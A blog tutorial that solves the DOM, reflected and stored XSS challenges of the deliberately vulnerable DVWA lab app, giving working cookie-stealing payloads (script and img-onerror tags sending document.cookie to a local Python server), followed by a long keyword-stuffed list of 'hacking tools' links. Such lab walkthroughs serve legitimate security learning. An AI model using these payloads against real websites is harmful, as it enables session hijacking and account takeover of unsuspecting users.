Monday, January 22, 2024

Learning Web Pentesting With DVWA Part 4: XSS (Cross Site Scripting)

In this article we are going to solve the Cross-Site Scripting Attack (XSS) challenges of DVWA app. Lets start by understanding what XSS attacks are. OWASP defines XSS as: "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page."
XSS attacks are usually used to steal user cookies which let attackers control the victim's account or to deface a website. The severity of this attack depends on what type of account is compromised by the attacker. If it is a normal user account, the impact may not be that much but if it is an admin account it could lead to compromise of the whole app or even the servers.

DOM, Sources, and Sinks:

DVWA has three types of XSS challenges. We'll describe them as we go through them in this article. But before we go about to solve these challenges we need to understand few things about a browser. We need to know what Document Object Model (DOM) is and what are sources & sinks. DOM is used by browsers as a hierarchical representation of elements in the webpage. Wikipedia defines DOM as "a cross-platform and language-independent interface that treats an XML or HTML document as a tree structure wherein each node is an object representing a part of the document. The DOM represents a document with a logical tree". A source can be described simply as input that a user supplies. And a sink can be defined as "potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it". Javascript function eval() is an example of a sink.

DOM Based XSS:

Now lets solve our first XSS challenge which is a DOM based XSS challenge. DOM based XSS occurs when sources are passed to sinks without proper validation. An attacker passes specifically crafted input to the sink to cause undesirable effects to the web app.
"Fundamentally, DOM-based vulnerabilities arise when a website passes data from a source to a sink, which then handles the data in an unsafe way in the context of the client's session."
On the DVWA app click on XSS (DOM), you will be presented with a page like this:
Keep an eye over the URL of the page. Now select a language and click the Select button. The URL should look like this now:
http://localhost:9000/vulnerabilities/xss_d/?default=English 
We are making a GET request to the server and sending a default parameter with the language that we select. This default parameter is the source and the server is passing this source to the sink directly without any validation. Now lets try to exploit this vulnerability by changing the URL to this:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>alert(XSS)</script> 
When we hit enter after modifying the URL in the URL bar of the browser we should see an alert box popup with XSS written on it. This proves that the app is passing the data from source to sink without any validation now its time that we steal some cookies. Open another terminal or tab and setup a simple http server using python3 like this:
python3 -m http.server 
By default the python http server runs on port 8000. Now lets modify the URL to steal the session cookies:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>new Image().src="http://localhost:8000/?c="+document.cookie;</script> 
The payload we have used here is from the github repository Payload all the things. It is an awesome repository of payloads. In this script, we define a new image whose source will be our python http server and we are appending user cookies to this request with the help of document.cookie javascript function. As can be seen in the image we get a request from the page as soon as the page loads with our xss payload and can see user cookies being passed with the request. That's it we have stolen the user cookies.

Reflected XSS:

Another type of XSS attack is called Reflected XSS Attack. OWASP describes Reflected XSS as those attacks "where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request."
To perform this type of attack, click on XSS (Reflected) navigation link in DVWA. After you open the web page you are presented with an input field that asks you to input your name.
Now just type your name and click on submit button. You'll see a response from server which contains the input that you provided. This response from the server which contains the user input is called reflection. What if we submit some javascript code in the input field lets try this out:
<script>alert("XSS")</script> 
After typing the above javascript code in the input field click submit. As soon as you hit submit you'll see a pop-up on the webpage which has XSS written on it. In order to steal some cookies you know what to do. Lets use another payload from payload all the things. Enter the code below in the input field and click submit:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie /> 
Here we are using img html tag and its onerror attribute to load our request. Since image x is not present on the sever it will run onerror javascipt function which performs a GET request to our python http server with user cookies. Like we did before.
Referencing OWASP again, it is mentioned that "Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS."
Obviously you'll need your super awesome social engineering skills to successfully execute this type of attack. But yeah we are good guys why would we do so?

Stored XSS:

The last type of XSS attack that we are going to see is Stored XSS Attack. OWASP describes Stored XSS attacks as those attacks "where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS."
To perform this type of XSS attack, click on XSS (Stored) navigation link in DVWA. As the page loads, we see a Guestbook Signing form.
In this form we have to provide our name and message. This information (name and message) is being stored in a database. Lets go for a test spin. Type your name and some message in the input fields and then click Sign Guestbook. You should see your name and message reflected down below the form. Now what makes stored XSS different from reflected XSS is that the information is stored in the database and hence will persist. When you performed a reflected XSS attack, the information you provided in the input field faded away and wasn't stored anywhere but during that request. In a stored XSS however our information is stored in the database and we can see it every time we visit the particular page. If you navigate to some other page and then navigate back to the XSS (Stored) page you'll see that your name and message is still there, it isn't gone. Now lets try to submit some javascript in the message box. Enter a name in the name input field and enter this script in the message box:
<script>alert(XSS)</script> 
When we click on the Sign Guestbook button, we get a XSS alert message.
Now when you try to write your cookie stealing payload you notice you cannot put your payload in the box as the maximum input length for the textarea is set to 50. To get rid of this restriction, right-click on the textarea box and click inspect. Change or delete the maxlength="50" attribute in code:
<textarea name="mtxMessage" cols="50" rows="3" maxlength="50"></textarea> 
to something like this:
<textarea name="mtxMessage" cols="50" rows="3"></textarea> 
And now use your payload to steal some cookies:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie /> 
Everytime a user visits this page you'll get his/her cookies (Sweet...). You don't need to send any links or try your super powerful social engineering skills to get user cookies. Your script is there in the database it will be loaded everytime a user visits this vulnerable page.
This is it for today see you next time.

References:

  1. DOM-based vulnerabilities: https://portswigger.net/web-security/dom-based
  2. DOM-based XSS: https://portswigger.net/web-security/cross-site-scripting/dom-based
  3. Document Object Model: https://en.wikipedia.org/wiki/Document_Object_Model
  4. Payload All the Things: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
  5. Cross Site Scripting (XSS): https://owasp.org/www-community/attacks/xss/
Continue reading

  1. Hacker Security Tools
  2. Pentest Tools
  3. Hacker Tools Linux
  4. Hacker Tools 2020
  5. Hack Tools For Windows
  6. Hacker Tools For Ios
  7. Hacking Tools For Windows
  8. Install Pentest Tools Ubuntu
  9. Hack Tools For Ubuntu
  10. Hacker Tool Kit
  11. Hack Tools For Mac
  12. Hacker Tools For Mac
  13. Easy Hack Tools
  14. Computer Hacker
  15. Hacker Techniques Tools And Incident Handling
  16. Hacking App
  17. Pentest Tools Review
  18. Github Hacking Tools
  19. Termux Hacking Tools 2019
  20. Termux Hacking Tools 2019
  21. Hacking Tools Usb
  22. Hacking Tools Usb
  23. Hacking Tools Pc
  24. Hacking Tools Kit
  25. Best Pentesting Tools 2018
  26. Pentest Tools Free
  27. Pentest Tools For Mac
  28. Pentest Tools Linux
  29. Hack Apps
  30. Underground Hacker Sites
  31. Hack Tools For Games
  32. Pentest Tools Bluekeep
  33. Pentest Tools Open Source
  34. Top Pentest Tools
  35. Pentest Tools Tcp Port Scanner
  36. Kik Hack Tools
  37. Hacker Tools For Mac
  38. Ethical Hacker Tools
  39. Pentest Tools Website Vulnerability
  40. Nsa Hack Tools Download
  41. Hacking Tools Mac
  42. Hack Tools Mac
  43. Hacking Tools 2019
  44. Hack Tools For Mac
  45. Hack Rom Tools
  46. Hacking Tools Software
  47. Hacker Tools For Pc
  48. Hacker Tools Hardware
  49. Pentest Tools For Mac
  50. Hacker Tools For Ios
  51. Hacker Tools Software
  52. Hacking Tools Mac
  53. Hacker Tools Free
  54. Hacking Tools Windows
  55. Hacking Tools Free Download
  56. Hacking Tools For Mac
  57. Github Hacking Tools
  58. Pentest Tools Github
  59. Hacker Tools Free Download
  60. Hack Tool Apk
  61. Hacking Tools For Mac
  62. Hacker Techniques Tools And Incident Handling
  63. Hacker Tools Apk
  64. Pentest Tools Url Fuzzer
  65. Tools 4 Hack
  66. Android Hack Tools Github
  67. Hacking Tools Windows
  68. Hacker Tools For Windows
  69. Pentest Tools Website Vulnerability
  70. Underground Hacker Sites
  71. Pentest Tools For Windows
  72. Hacker Tools Linux
  73. Hacker Techniques Tools And Incident Handling
  74. Pentest Tools For Android
  75. Hacker
  76. Android Hack Tools Github
  77. Pentest Tools Alternative
  78. Hacker Tools For Mac
  79. Pentest Tools Android
  80. Hacker Tools Free
  81. Blackhat Hacker Tools
  82. Hacking Tools For Windows Free Download
  83. Hacking Tools For Beginners
  84. Hacking Tools For Pc
  85. Hacking Tools For Pc
  86. Termux Hacking Tools 2019
  87. Hacking Tools For Beginners
  88. Hack Rom Tools
  89. Nsa Hack Tools
  90. Hack Tools Github
  91. Hacker Tools
  92. Nsa Hacker Tools
  93. Hacker Tools Apk Download
  94. Hacking Tools Hardware
  95. Hacking Tools For Games
  96. What Are Hacking Tools
  97. Pentest Tools For Android
  98. Hacking Tools Kit
  99. Tools 4 Hack
  100. Usb Pentest Tools
  101. Hacker Tools Mac
  102. Hacker Tools Software
  103. Hack Tools Github
  104. Hacker Tools For Mac
  105. Hacking Tools For Windows Free Download
  106. Hacker Tools Linux
  107. Install Pentest Tools Ubuntu
  108. Github Hacking Tools
  109. Top Pentest Tools
  110. Hacker Hardware Tools
  111. Hacker
  112. Hackers Toolbox
  113. Best Pentesting Tools 2018
  114. Hackrf Tools
  115. Hack And Tools
  116. Hack Apps
  117. Hack Tools
  118. Hacking Tools For Games
  119. Hacking Tools For Windows Free Download
  120. Nsa Hack Tools
  121. Hack Tools Pc
  122. How To Make Hacking Tools
  123. Pentest Tools For Android
  124. Tools Used For Hacking
  125. Hacking Tools Kit
  126. Hacking Tools For Mac
  127. Hacking Tools Github
  128. How To Install Pentest Tools In Ubuntu
  129. Pentest Tools Android
  130. Hacker Tools Apk Download
  131. Hacking Tools Kit
  132. Hacking Tools Kit
  133. Pentest Tools For Windows
  134. Hackers Toolbox
  135. Hack Tools Pc
  136. Hacking Tools Pc
  137. Hak5 Tools
  138. Hacking Tools
  139. Hacking Tools Download
  140. Hack Tools For Pc
  141. Usb Pentest Tools
  142. Tools Used For Hacking
  143. Install Pentest Tools Ubuntu
  144. Hacking Tools Windows
  145. Underground Hacker Sites
  146. Pentest Tools For Ubuntu
  147. Beginner Hacker Tools
  148. Hacking Apps
  149. Pentest Automation Tools
  150. Pentest Tools Nmap
  151. Underground Hacker Sites
  152. New Hack Tools
  153. Hacker Tools Mac
  154. Pentest Tools Open Source
  155. Hacker Tools For Mac
  156. Pentest Tools
  157. Hacking Tools For Beginners
  158. Hacking App
  159. Hacker Tools Software
  160. Pentest Automation Tools
  161. Bluetooth Hacking Tools Kali
  162. Hacker Tools Hardware
  163. Hacker Tools 2020
  164. Github Hacking Tools

No comments:

Post a Comment